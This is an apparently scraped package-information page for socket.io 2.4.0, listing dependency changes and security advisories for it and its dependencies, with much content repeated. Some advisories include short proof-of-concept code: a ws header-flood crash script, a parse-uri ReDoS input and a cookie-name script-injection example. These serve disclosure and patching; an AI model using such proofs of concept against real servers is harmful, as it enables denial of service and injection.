Version Details and Security Vulnerabilities

📦

socket.io

2.4.0

Comparision Betweeen 2.4.0 and 2.3.0

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

Unpacked Size

54.35 KB

54.61 KB

Version 2.4.0 Details

Socket.IO version 2.4.0 is a node.js realtime framework server, building upon the functionalities of the preceding 2.3.0 version. Both iterations provide developers with tools for enabling real-time, bidirectional communication between web clients and servers. The core description remains the same, offering a robust solution for applications needing immediate data exchange.

A key difference lies in the updated dependencies. Version 2.4.0 incorporates engine.io version ~3.5.0, an upgrade from ~3.4.0 present in version 2.3.0. The socket.io-client dependency is correspondingly updated to 2.4.0 to maintain compatibility within the Socket.IO ecosystem. This usually signifies bug fixes, performance improvements, and potentially new features within the underlying engine that handles low-level transport mechanisms. While other dependencies such as debug, has-binary2, socket.io-parser, and socket.io-adapter remain consistent, the engine.io bump is noteworthy.

Furthermore, version 2.4.0 was released on January 4, 2021, while version 2.3.0 was released on September 20, 2019. The newer version has a smaller unpacked size of 55652 compared to 55917 of the older version, and had 9 files compared to the 8 of the previous iteration. Developers should consider upgrading to 2.4.0 to leverage the latest improvements in engine.io and socket.io-client, ensuring optimal performance, security, and feature support in their real-time applications, potentially benefiting from bug fixes implemented since the 2.3.0 release.

Security Vulnerabilities

This site is an independent open-source project and is not affiliated with, endorsed by, or sponsored by npm, Inc. or GitHub, Inc. The name “npm” is a registered trademark of npm, Inc., used here solely to describe compatibility and reference publicly available npm package data.

Version Details and Security Vulnerabilities

📦

socket.io

2.4.0

Comparision Betweeen 2.4.0 and 2.3.0

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

Unpacked Size

54.35 KB

54.61 KB

Version 2.4.0 Details

Security Vulnerabilities

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 2.4.0 of the package socket.io.

All Security Vulnerabilities

All the vulnerabilities related to the version 2.4.0 of the package

Summary:

socket.io has an unhandled 'error' event

Details:

Impact

A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.

node:events:502
    throw err; // Unhandled 'error' event
    ^

Error [ERR_UNHANDLED_ERROR]: Unhandled error. (undefined)
    at new NodeError (node:internal/errors:405:5)
    at Socket.emit (node:events:500:17)
    at /myapp/node_modules/socket.io/lib/socket.js:531:14
    at process.processTicksAndRejections (node:internal/process/task_queues:77:11) {
  code: 'ERR_UNHANDLED_ERROR',
  context: undefined
}

Affected versions

| Version range | Needs minor update? | |------------------|------------------------------------------------| | 4.6.2...latest | Nothing to do | | 3.0.0...4.6.1 | Please upgrade to socket.io@4.6.2 (at least) | | 2.3.0...2.5.0 | Please upgrade to socket.io@2.5.1 |

Patches

This issue is fixed by https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115, included in socket.io@4.6.2 (released in May 2023).

The fix was backported in the 2.x branch today: https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c

Workarounds

As a workaround for the affected versions of the socket.io package, you can attach a listener for the "error" event:

io.on("connection", (socket) => {
  socket.on("error", () => {
    // ...
  });
});

For more information

If you have any questions or comments about this advisory:

Open a discussion here

Thanks a lot to Paul Taylor for the responsible disclosure.

References

https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115
https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c

Details about socket.io@2.4.0

Summary:

Regular Expression Denial of Service in debug

Details:

Affected versions of debug are vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter.

As it takes 50,000 characters to block the event loop for 2 seconds, this issue is a low severity issue.

This was later re-introduced in version v3.2.0, and then repatched in versions 3.2.7 and 4.3.1.

Recommendation

Version 2.x.x: Update to version 2.6.9 or later. Version 3.1.x: Update to version 3.1.0 or later. Version 3.2.x: Update to version 3.2.7 or later. Version 4.x.x: Update to version 4.3.1 or later.

Details about debug@4.1.1

Summary:

Resource exhaustion in engine.io

Details:

Engine.IO before 4.0.0 and 3.6.0 allows attackers to cause a denial of service (resource consumption) via a POST request to the long polling transport.

Details about engine.io@3.5.0

Summary:

Uncaught exception in engine.io

Details:

Impact

A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process.

events.js:292
      throw er; // Unhandled 'error' event
      ^

Error: read ECONNRESET
    at TCP.onStreamRead (internal/stream_base_commons.js:209:20)
Emitted 'error' event on Socket instance at:
    at emitErrorNT (internal/streams/destroy.js:106:8)
    at emitErrorCloseNT (internal/streams/destroy.js:74:3)
    at processTicksAndRejections (internal/process/task_queues.js:80:21) {
  errno: -104,
  code: 'ECONNRESET',
  syscall: 'read'
}

This impacts all the users of the engine.io package, including those who uses depending packages like socket.io.

Patches

A fix has been released today (2022/11/20):

| Version range | Fixed version | |-------------------|---------------| | engine.io@3.x.y | 3.6.1 | | engine.io@6.x.y | 6.2.1 |

For socket.io users:

| Version range | engine.io version | Needs minor update? | |-----------------------------|---------------------|--------------------------------------------------------------------------------------------------------| | socket.io@4.5.x | ~6.2.0 | npm audit fix should be sufficient | | socket.io@4.4.x | ~6.1.0 | Please upgrade to socket.io@4.5.x | | socket.io@4.3.x | ~6.0.0 | Please upgrade to socket.io@4.5.x | | socket.io@4.2.x | ~5.2.0 | Please upgrade to socket.io@4.5.x | | socket.io@4.1.x | ~5.1.1 | Please upgrade to socket.io@4.5.x | | socket.io@4.0.x | ~5.0.0 | Please upgrade to socket.io@4.5.x | | socket.io@3.1.x | ~4.1.0 | Please upgrade to socket.io@4.5.x (see here) | | socket.io@3.0.x | ~4.0.0 | Please upgrade to socket.io@4.5.x (see here) | | socket.io@2.5.0 | ~3.6.0 | npm audit fix should be sufficient | | socket.io@2.4.x and below | ~3.5.0 | Please upgrade to socket.io@2.5.0 |

Workarounds

There is no known workaround except upgrading to a safe version.

For more information

If you have any questions or comments about this advisory:

Open an issue in engine.io

Thanks to Jonathan Neve for the responsible disclosure.

Details about engine.io@3.5.0

Summary:

ws affected by a DoS when handling a request with many HTTP headers

Details:

Impact

A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Patches

The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)

Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
Set server.maxHeadersCount to 0 so that no limit is applied.

Credits

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

References

https://github.com/websockets/ws/issues/2230
https://github.com/websockets/ws/pull/2231

Details about ws@7.4.6

Summary:

cookie accepts cookie name, path, and domain with out of bounds characters

Details:

Impact

The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. For example, serialize("userName=<script>alert('XSS3')</script>; Max-Age=2592000; a", value) would result in "userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test", setting userName cookie to <script> and ignoring value.

A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie.

Patches

Upgrade to 0.7.0, which updates the validation for name, path, and domain.

Workarounds

Avoid passing untrusted or arbitrary values for these fields, ensure they are set by the application instead of user input.

References

https://github.com/jshttp/cookie/pull/167

Details about cookie@0.4.2

Summary:

parse-uri Regular expression Denial of Service (ReDoS)

Details:

An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.

PoC

async function exploit() {
    const parseuri = require("parse-uri");
    // This input is designed to cause excessive backtracking in the regex
    const craftedInput = 'http://example.com/' + 'a'.repeat(30000) + '?key=value';
    const result = await parseuri(craftedInput);
    }
await exploit();

Details about parseuri@0.0.6

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 2.4.0 of the package socket.io.

All Security Vulnerabilities

All the vulnerabilities related to the version 2.4.0 of the package

Summary:

socket.io has an unhandled 'error' event

Details:

Impact

A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.

node:events:502
    throw err; // Unhandled 'error' event
    ^

Error [ERR_UNHANDLED_ERROR]: Unhandled error. (undefined)
    at new NodeError (node:internal/errors:405:5)
    at Socket.emit (node:events:500:17)
    at /myapp/node_modules/socket.io/lib/socket.js:531:14
    at process.processTicksAndRejections (node:internal/process/task_queues:77:11) {
  code: 'ERR_UNHANDLED_ERROR',
  context: undefined
}

Affected versions

Patches

This issue is fixed by https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115, included in socket.io@4.6.2 (released in May 2023).

The fix was backported in the 2.x branch today: https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c

Workarounds

As a workaround for the affected versions of the socket.io package, you can attach a listener for the "error" event:

io.on("connection", (socket) => {
  socket.on("error", () => {
    // ...
  });
});

For more information

If you have any questions or comments about this advisory:

Open a discussion here

Thanks a lot to Paul Taylor for the responsible disclosure.

References

https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115
https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c

Details about socket.io@2.4.0

Summary:

Regular Expression Denial of Service in debug

Details:

Affected versions of debug are vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter.

As it takes 50,000 characters to block the event loop for 2 seconds, this issue is a low severity issue.

This was later re-introduced in version v3.2.0, and then repatched in versions 3.2.7 and 4.3.1.

Recommendation

Version 2.x.x: Update to version 2.6.9 or later. Version 3.1.x: Update to version 3.1.0 or later. Version 3.2.x: Update to version 3.2.7 or later. Version 4.x.x: Update to version 4.3.1 or later.

Details about debug@4.1.1

Summary:

Resource exhaustion in engine.io

Details:

Engine.IO before 4.0.0 and 3.6.0 allows attackers to cause a denial of service (resource consumption) via a POST request to the long polling transport.

Details about engine.io@3.5.0

Summary:

Uncaught exception in engine.io

Details:

Impact

A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process.

events.js:292
      throw er; // Unhandled 'error' event
      ^

Error: read ECONNRESET
    at TCP.onStreamRead (internal/stream_base_commons.js:209:20)
Emitted 'error' event on Socket instance at:
    at emitErrorNT (internal/streams/destroy.js:106:8)
    at emitErrorCloseNT (internal/streams/destroy.js:74:3)
    at processTicksAndRejections (internal/process/task_queues.js:80:21) {
  errno: -104,
  code: 'ECONNRESET',
  syscall: 'read'
}

This impacts all the users of the engine.io package, including those who uses depending packages like socket.io.

Patches

A fix has been released today (2022/11/20):

| Version range | Fixed version | |-------------------|---------------| | engine.io@3.x.y | 3.6.1 | | engine.io@6.x.y | 6.2.1 |

For socket.io users:

Workarounds

There is no known workaround except upgrading to a safe version.

For more information

If you have any questions or comments about this advisory:

Open an issue in engine.io

Thanks to Jonathan Neve for the responsible disclosure.

Details about engine.io@3.5.0

Summary:

ws affected by a DoS when handling a request with many HTTP headers

Details:

Impact

A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Patches

Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
Set server.maxHeadersCount to 0 so that no limit is applied.

Credits

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

References

https://github.com/websockets/ws/issues/2230
https://github.com/websockets/ws/pull/2231

Details about ws@7.4.6

Summary:

cookie accepts cookie name, path, and domain with out of bounds characters

Details:

Impact

A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie.

Patches

Upgrade to 0.7.0, which updates the validation for name, path, and domain.

Workarounds

Avoid passing untrusted or arbitrary values for these fields, ensure they are set by the application instead of user input.

References

https://github.com/jshttp/cookie/pull/167

Details about cookie@0.4.2

Summary:

parse-uri Regular expression Denial of Service (ReDoS)

Details:

An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.

PoC

async function exploit() {
    const parseuri = require("parse-uri");
    // This input is designed to cause excessive backtracking in the regex
    const craftedInput = 'http://example.com/' + 'a'.repeat(30000) + '?key=value';
    const result = await parseuri(craftedInput);
    }
await exploit();

Details about parseuri@0.0.6

Version Details and Security Vulnerabilities

socket.io

Comparision Betweeen 2.4.0 and 2.3.0

Version 2.4.0 Details

Security Vulnerabilities

Version Details and Security Vulnerabilities

socket.io

Comparision Betweeen 2.4.0 and 2.3.0

Version 2.4.0 Details

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

socket.io@2.4.0 GHSA-25hc-qcg6-38wj 6.9

Impact

Affected versions

Patches

Workarounds

For more information

References

debug@4.1.1 GHSA-gxpj-cx7g-858c 3.7

Recommendation

engine.io@3.5.0 GHSA-j4f2-536g-r55m 7.5

engine.io@3.5.0 GHSA-r7qp-cfhv-p84w 6.5

Impact

Patches

Workarounds

For more information

ws@7.4.6 GHSA-3h5v-q93c-6h6q 8.7

Impact

Proof of concept

Patches

Workarounds

Credits

References

cookie@0.4.2 GHSA-pxg6-pf52-xh8x N/A

Impact

Patches

Workarounds

References

parseuri@0.0.6 GHSA-6fx8-h7jm-663j 6.9

PoC

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

socket.io@2.4.0 GHSA-25hc-qcg6-38wj 6.9

Impact

Affected versions

Patches

Workarounds

For more information

References

debug@4.1.1 GHSA-gxpj-cx7g-858c 3.7

Recommendation

engine.io@3.5.0 GHSA-j4f2-536g-r55m 7.5

engine.io@3.5.0 GHSA-r7qp-cfhv-p84w 6.5

Impact

Patches

Workarounds

For more information

ws@7.4.6 GHSA-3h5v-q93c-6h6q 8.7

Impact

Proof of concept

Patches

Workarounds

Credits

References

cookie@0.4.2 GHSA-pxg6-pf52-xh8x N/A

Impact

Patches

Workarounds

References

parseuri@0.0.6 GHSA-6fx8-h7jm-663j 6.9

PoC